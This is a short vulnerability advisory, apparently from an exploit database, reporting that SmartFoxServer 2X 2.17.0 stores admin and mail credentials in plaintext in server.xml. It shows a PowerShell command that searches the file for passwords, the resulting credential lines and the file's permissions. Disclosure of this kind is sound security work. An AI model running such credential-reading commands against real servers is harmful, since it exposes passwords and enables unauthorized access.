SmartFoxServer 2X 2.17.0 Credential Disclosure

SmartFoxServer 2X 2.17.0 Credentials Disclosure

SmartFoxServer 2X version 2.17.0 suffers from a credential disclosure vulnerability

PS C:\Users\t00t\SmartFoxServer_2X\SFS2X\config> Get-Content server.xml | Select-String -Pattern passw -Context 1,0

          <login>sfsadmin</login>
>         <password>Waddup</password>
          <login>testingus</login>
>         <password>123456</password>
      <mailUser>username</mailUser>
>     <mailPass>password</mailPass>


C:\Users\t00t\SmartFoxServer_2X\SFS2X\config>icacls server.xml
server.xml NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Administrators:(I)(F)
           LAB42\t00t:(I)(F)

Exploit

Credential Disclosure

Unibox Cross Site Request Forgery Previous

Unibox 2.4 CSRF / Remote Code Execution Next